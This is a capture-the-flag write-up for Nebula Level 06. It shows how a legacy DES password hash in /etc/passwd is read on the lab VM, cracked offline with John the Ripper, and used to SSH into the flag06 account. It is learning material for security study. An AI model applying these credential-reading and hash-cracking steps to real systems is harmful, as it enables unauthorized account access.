Level 06

Description

The flag06 account credentials came from a legacy unix system.

To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Approach

In modern Linux systems, user passwords are encrypted and stored in /etc/shadow, which is only readable by root. The /etc/passwd file, which is readable by everyone, typically contains an x in the password field to indicate this configuration.

However, in legacy UNIX systems, password hashes were stored directly in /etc/passwd.

1. Let’s inspect the /etc/passwd file and look specifically for the flag06 user.

   level06@nebula:/home/flag06$ cat /etc/passwd | grep flag06
   

2. The output reveals an actual password hash (ueqwOCnSGdsuM) instead of an x placeholder.

   flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
   

3. Since we have read the hash, we can attempt to crack it. Because password cracking tools like john are not installed on the Nebula VM, we copy the hash to our local machine.

   ┌──(himanshu@Kaaammui)-[/tmp]-(16-05-2026 11:56:37)
   └─$ echo "flag06:ueqwOCnSGdsuM" > hash.txt
   

4. We run John the Ripper (john) against our hash file. It quickly identifies it as a descrypt hash and cracks the password: hello.

   ┌──(himanshu@Kaaammui)-[/tmp]-(16-05-2026 12:12:22)
   └─$ john hash.txt
   

5. Armed with the plaintext password, we can SSH directly into the flag06 account.

   ┌──(himanshu@Kaaammui)-[~/Desktop/ctf/exploit.education/Nebula/LEVEL06]-(16-05-2026 12:14:28)
   └─$ ssh -p 2222 flag06@127.0.0.1 
   

6. Once logged in as flag06, we simply run getflag to complete the challenge.

Output

level06@nebula:/home/flag06$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

# On the attacker machine
┌──(himanshu@Kaaammui)-[/tmp]-(16-05-2026 11:56:37)
└─$ echo "flag06:ueqwOCnSGdsuM" > hash.txt                           
┌──(himanshu@Kaaammui)-[/tmp]-(16-05-2026 12:12:22)
└─$ john hash.txt                                                                                                                                                                     
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 256/256 AVX2])
Will run 12 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 642 candidates buffered for the current salt, minimum 3072 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst
hello            (flag06)     
1g 0:00:00:00 DONE 2/3 (2026-05-16 12:12) 20.00g/s 1500Kp/s 1500Kc/s 1500KC/s 123456..2nesbitt
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(himanshu@Kaaammui)-[~/Desktop/ctf/exploit.education/Nebula/LEVEL06]-(16-05-2026 12:14:28)
└─$ ssh -p 2222 flag06@127.0.0.1 
...
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account